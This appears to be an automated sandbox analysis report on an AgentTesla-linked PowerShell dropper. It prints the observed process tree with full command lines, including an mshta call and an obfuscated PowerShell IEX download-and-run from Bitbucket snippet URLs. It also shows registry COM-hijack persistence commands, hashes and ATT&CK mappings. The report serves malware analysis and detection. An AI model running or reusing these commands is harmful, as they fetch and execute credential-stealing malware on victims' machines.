Overview

overview

10

Static

static

code.ps1

windows7-x64

10

code.ps1

windows10-2004-x64

10

Analysis

  • max time kernel
    79s
  • max time network
    129s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-09-2022 23:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    code.ps1

  • Size

    138B

  • MD5

    efa136867081936967a0ac27271b2fda

  • SHA1

    756f0d9e09882c8531618458e5d582fd5b46fbad

  • SHA256

    e4cda1631a3df7932fb319567b2696e096d1f59f66a6d1611436217943bd692e

  • SHA512

    77e76132c86321792cb621cc9c9f298b59a6ee813553fb2199a1ea82c60549c95c38ed0574c25b40faecfcccdd7931134fae8817fa8ac30c0eb405e4a2eed711

Score
10/10
agentteslacollectionkeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://bitbucket.org/!api/2.0/snippets/tinypro/yEG5xg/87f5d9d29b55f427e764f574f85ffdc00d4e918b/files/black2.txt

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Registers COM server for autorun 1 TTPs 2 IoCs
    persistence
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\code.ps1
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4788
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c start /min mshta https://bitbucket.org/!api/2.0/snippets/tinypro/yEG5xg/87f5d9d29b55f427e764f574f85ffdc00d4e918b/files/black2.txt
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:8
      • C:\Windows\system32\mshta.exe
        mshta https://bitbucket.org/!api/2.0/snippets/tinypro/yEG5xg/87f5d9d29b55f427e764f574f85ffdc00d4e918b/files/black2.txt
        3⤵
        • Blocklisted process makes network request
        PID:2156
  • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
    POWERSHELL $HPJSWDLAZGWFDZYDFHWGFRU = '[%9%{!)<60%7]643]%((!^]y%9%{!)<60%7]643]%((!^]t\+!{{@901}8-#+([)]#/=}&{0}#23{1=##<%9-+90*4+.IO.%9%{!)<60%7]643]%((!^]t{)]<5/]9928(@-%*})\<$@\+!{{@901}8-#+([)]#/=}_#=#9)<+/&53\+]}70#-*6&{0}#23{1=##<%9-+90*4+{)]<5/]9928(@-%*})\<$@\+!{{@901}8-#+([)]#/=}_#=#9)<+/&53\+]}70#-*6d\+!{{@901}8-#+([)]#/=}{)]<5/]9928(@-%*})\<$@]'.Replace('%9%{!)<60%7]643]%((!^]','S').Replace('\+!{{@901}8-#+([)]#/=}','E').Replace('{)]<5/]9928(@-%*})\<$@','R').Replace('_#=#9)<+/&53\+]}70#-*6','A').Replace('&{0}#23{1=##<%9-+90*4+','M');$HFVVYPXEVBJEIVAVHEPLSDU = ($HPJSWDLAZGWFDZYDFHWGFRU -Join '')|&('I'+'EX');$HKLNYCJAXBTERCXRLWVDDRR = '[$0[-_<#)(+}%]\3%7\(5&#y$0[-_<#)(+}%]\3%7\(5&#*^(!+72@//61)!18$/<%8[+&=#*$)4$<3}!1<)@3##5=m.N+&=#*$)4$<3}!1<)@3##5=*^(!+72@//61)!18$/<%8[.W+&=#*$)4$<3}!1<)@3##5=bR+&=#*$)4$<3}!1<)@3##5=qu+&=#*$)4$<3}!1<)@3##5=$0[-_<#)(+}%]\3%7\(5&#*^(!+72@//61)!18$/<%8[]'.Replace('$0[-_<#)(+}%]\3%7\(5&#','S').Replace('+&=#*$)4$<3}!1<)@3##5=','E').Replace('*^(!+72@//61)!18$/<%8[','T');$HHKOVSNBTTKFPLKUTNGTEHB = ($HKLNYCJAXBTERCXRLWVDDRR -Join '')|&('I'+'EX');$HTZCELDOJQNRIVJVBXAVZND = '\][0{2=!#**(#<)4$/{=^%r11+[/-}*(1}3(}]+(#)6[]a<!=7!}\7)9&$[[)/4/&[/&11+[/-}*(1}3(}]+(#)6[]'.Replace('\][0{2=!#**(#<)4$/{=^%','C').Replace('11+[/-}*(1}3(}]+(#)6[]','E').Replace('<!=7!}\7)9&$[[)/4/&[/&','T');$HJJPDTCBEJQGGUGWFGICSKF = '{!@{8=!@4!(52!5=$1_##*&5<22_0_)1\%*#}*(6[867tR&5<22_0_)1\%*#}*(6[867[={9}@&&6*48{8}6_+3%=*pon[={9}@&&6*48{8}6_+3%=*&5<22_0_)1\%*#}*(6[867'.Replace('{!@{8=!@4!(52!5=$1_##*','G').Replace('&5<22_0_)1\%*#}*(6[867','E').Replace('[={9}@&&6*48{8}6_+3%=*','S');$HYRGAIQZLYZNHUPAAKKHBKR = 'G!!((=#^55=^9&7^3$_4=1/t[%\*\][6!)-[8$5!41<#1_!!((=#^55=^9&7^3$_4=1/7({=\[#%*6@0088{}\43}@pon7({=\[#%*6@0088{}\43}@!!((=#^55=^9&7^3$_4=1/7({=\[#%*6@0088{}\43}@t[%\*\][6!)-[8$5!41<#1_!!((=#^55=^9&7^3$_4=1/am'.Replace('7({=\[#%*6@0088{}\43}@','S').Replace('!!((=#^55=^9&7^3$_4=1/','E').Replace('[%\*\][6!)-[8$5!41<#1_','R');$HSIYIVTRGVUTCUUELHVIWZX = '}2=29-^$/4!#%4_6^(9<@[&_/2\4*4=(\7_]}](4_\_)a^[<2_/^@429<&238}@][#=To&_/2\4*4=(\7_]}](4_\_)n^[<2_/^@429<&238}@][#='.Replace('}2=29-^$/4!#%4_6^(9<@[','R').Replace('&_/2\4*4=(\7_]}](4_\_)','E').Replace('^[<2_/^@429<&238}@][#=','D');&('I'+'EX')($HFVVYPXEVBJEIVAVHEPLSDU::new($HHKOVSNBTTKFPLKUTNGTEHB::$HTZCELDOJQNRIVJVBXAVZND('https://bitbucket.org/!api/2.0/snippets/tinypro/dk958p/b15a5d7c2c03c07fb8aac916623be0799dce12bf/files/black1.txt').$HJJPDTCBEJQGGUGWFGICSKF().$HYRGAIQZLYZNHUPAAKKHBKR()).$HSIYIVTRGVUTCUUELHVIWZX())
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:204
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.ps1'"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4188
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.vbs"
        3⤵
          PID:4144
    • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
      POWERSHELL -noProfilE -ExEcutionPolicy Bypass -Command C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat
      1⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1176
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3016
        • C:\Windows\system32\reg.exe
          REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
          3⤵
          • Modifies registry class
          • Modifies registry key
          PID:1836
        • C:\Windows\system32\reg.exe
          REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
          3⤵
          • Registers COM server for autorun
          • Modifies registry class
          • Modifies registry key
          PID:1228
        • C:\Windows\system32\cmd.exe
          cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3096
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"
            4⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3492
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              5⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious behavior: EnumeratesProcesses
              • outlook_office_path
              • outlook_win_path
              PID:4452

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Lateral Movement

    Collection

    Email Collection

    1
    T1114

    Exfiltration

    Command and Control

    Web Service

    1
    T1102

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1
      Filesize

      822KB

      MD5

      c3ddc5e381afdddfbc1e8d04f1c39ef2

      SHA1

      c37e9e81c44964a38863ec6de554b9bf54d76554

      SHA256

      be5782e51be21e6494f65e93a28618fc1d7be187b807c681df1ead13bcb51577

      SHA512

      60ae45e8320fec519372ecf1d907c2b5cdeafa574cd68083ccb41b3760bfebeec0e11fc8802c247b6f032f4e2dc900de176495200c55a915c5ad44cf98b2b489

      Download Submit
    • C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat
      Filesize

      693B

      MD5

      5a52e1c0f7e19f6b96c875310238e048

      SHA1

      6a017b2933ffb51c025fce852abd0e356b0e2b1d

      SHA256

      14e860c94a8664901099340f7a4f97362a64ef149a53e5df31a5a4d383a51d2a

      SHA512

      ddeb3ffd4c2c88c264c6c3587a33ac229afd44ed3a82fcf244e3069e8e0a28be328fded4b40d438185ccacbefb5ccd5d1df40292be825b0f9587b63fbc781f5d

      Download Submit
    • C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.ps1
      Filesize

      3KB

      MD5

      21df908f451a93e32692c2fe8b34162e

      SHA1

      25f4e917312bf21ad9289348b682a292e657cc4d

      SHA256

      ce05b804fdf14f27ab9617e55a7b431bba49325ae749a97a3ee9cff469b36e2e

      SHA512

      6f4d3f109fec3a9d92f36fae2d1eb2bea4c59dbe2b73e92e7f2175f2ca985b9c71f8905d4e6589d4cc010497403729bf7b718efb437f47fd819f16d74bea5ace

      Download Submit
    • C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.vbs
      Filesize

      2KB

      MD5

      1f420d8b494afee108abdbdce860be6d

      SHA1

      06029153e26d9a107f5831ab001f3e43ae6d4aae

      SHA256

      51bfac3e3d2230f21591bd59362c2f657a69614ea893a64644879f3010540275

      SHA512

      bf1e5b622141bb19096f6b8674b92579d0a045f7919beebdcca57f620900836e43d06f17d938697924942b0746087ddad902129887b7da3788256c0a0356d217

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      feadc4e1a70c13480ef147aca0c47bc0

      SHA1

      d7a5084c93842a290b24dacec0cd3904c2266819

      SHA256

      5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac

      SHA512

      c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      86eb6503a4369ba02e54f310394db0a1

      SHA1

      3f519fc1eab40102b8329836855515fa1a5a5c27

      SHA256

      93a59b92673bb64aa3f95ea02094767878d58f1070ba6aa257cc803716e87643

      SHA512

      48698a143499ea291361937f0f2bf9fe2ed0c655c91d18c23fbd0200b0d33108d6c5004c429b1a987bcc5ec2b4956f605ec0270c7828188eaaa919468b13f9af

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      aa187cac09f051e24146ad549a0f08a6

      SHA1

      2ef7fae3652bb838766627fa6584a6e3b5e74ff3

      SHA256

      7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f

      SHA512

      960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      446dd1cf97eaba21cf14d03aebc79f27

      SHA1

      36e4cc7367e0c7b40f4a8ace272941ea46373799

      SHA256

      a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

      SHA512

      a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

      Download Submit
    • memory/8-133-0x0000000000000000-mapping.dmp
      Download
    • memory/204-158-0x00007FFA52570000-0x00007FFA53031000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/204-141-0x00007FFA52570000-0x00007FFA53031000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/204-140-0x00007FFA52570000-0x00007FFA53031000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/1176-165-0x00007FFA52570000-0x00007FFA53031000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/1176-147-0x00007FFA52570000-0x00007FFA53031000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/1228-151-0x0000000000000000-mapping.dmp
      Download
    • memory/1836-150-0x0000000000000000-mapping.dmp
      Download
    • memory/2156-135-0x0000000000000000-mapping.dmp
      Download
    • memory/3016-148-0x0000000000000000-mapping.dmp
      Download
    • memory/3096-152-0x0000000000000000-mapping.dmp
      Download
    • memory/3492-153-0x0000000000000000-mapping.dmp
      Download
    • memory/3492-159-0x00000276BBEB0000-0x00000276BBECA000-memory.dmp
      Filesize

      104KB

      Download
    • memory/3492-163-0x00007FFA52570000-0x00007FFA53031000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/3492-156-0x00007FFA52570000-0x00007FFA53031000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4144-145-0x0000000000000000-mapping.dmp
      Download
    • memory/4188-142-0x0000000000000000-mapping.dmp
      Download
    • memory/4188-154-0x00007FFA52570000-0x00007FFA53031000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4188-144-0x00007FFA52570000-0x00007FFA53031000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4452-168-0x0000000005110000-0x00000000051AC000-memory.dmp
      Filesize

      624KB

      Download
    • memory/4452-161-0x00000000004359EE-mapping.dmp
      Download
    • memory/4452-166-0x0000000000760000-0x000000000079A000-memory.dmp
      Filesize

      232KB

      Download
    • memory/4452-167-0x00000000055C0000-0x0000000005B64000-memory.dmp
      Filesize

      5.6MB

      Download
    • memory/4452-160-0x0000000000400000-0x000000000043A000-memory.dmp
      Filesize

      232KB

      Download
    • memory/4452-169-0x0000000005D50000-0x0000000005DB6000-memory.dmp
      Filesize

      408KB

      Download
    • memory/4452-170-0x0000000006480000-0x00000000064D0000-memory.dmp
      Filesize

      320KB

      Download
    • memory/4452-171-0x0000000006770000-0x0000000006802000-memory.dmp
      Filesize

      584KB

      Download
    • memory/4452-172-0x0000000006740000-0x000000000674A000-memory.dmp
      Filesize

      40KB

      Download
    • memory/4788-132-0x000001FA58E50000-0x000001FA58E72000-memory.dmp
      Filesize

      136KB

      Download
    • memory/4788-136-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4788-134-0x00007FFA541B0000-0x00007FFA54C71000-memory.dmp
      Filesize

      10.8MB

      Download